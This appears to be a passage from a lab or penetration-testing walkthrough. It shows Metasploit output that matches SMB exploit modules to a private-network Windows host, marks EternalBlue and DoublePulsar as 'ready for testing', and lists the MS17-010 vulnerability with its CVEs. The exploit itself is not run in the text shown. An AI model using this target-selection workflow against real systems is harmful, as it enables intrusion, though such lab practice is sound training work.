[*]   192.168.248.133:445  exploit/windows/smb/ms05_039_pnp  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms06_040_netapi  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms06_066_nwapi  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms06_066_nwwks  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms06_070_wkssvc  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms07_029_msdns_zonename  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms08_067_netapi  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms10_061_spoolss  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms17_010_eternalblue  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/ms17_010_psexec  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/psexec  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/smb_doublepulsar_rce  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/smb_relay  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/smb_rras_erraticgopher  (port match)
[*]   192.168.248.133:445  exploit/windows/smb/timbuktu_plughntcommand_bof  (port match)
[*] ================================================================================
[*]
[*]
```

```
[*]   192.168.248.133:445  exploit/windows/smb/ms17_010_eternalblue  (port match)
```
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > analyze
[*] Analysis for 192.168.248.133 ->
[*]   exploit/windows/smb/ms17_010_eternalblue - ready for testing
[*]   exploit/windows/smb/ms17_010_psexec - credentials are required
[*]   exploit/windows/smb/smb_doublepulsar_rce - ready for testing
```
```
msf6 exploit(windows/smb/ms17_010_eternalblue) > vulns

Vulnerabilities
===============

Timestamp                Host             Name                        References
---------                ----             ----                        ----------
2023-01-08 13:38:28 UTC  192.168.248.133  MS17-010 SMB RCE Detection  CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148,MSB-MS17-010,URL-https://zerosum0
                                                                      x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html,URL-https://github.com/countercept/doublepulsar-d
                                                                      etection-script,URL-https://web.archive.org/web/20170513050203/https://technet.microsoft.com/en-us/library/security/m
                                                                      s17-010.aspx,URL-https://github.com/RiskSense-Ops/MS17-010,URL-https://risksense.com/wp-content/uploads/2018/05/White
                                                                      -Paper_Eternal-Blue.pdf,EDB-42030
```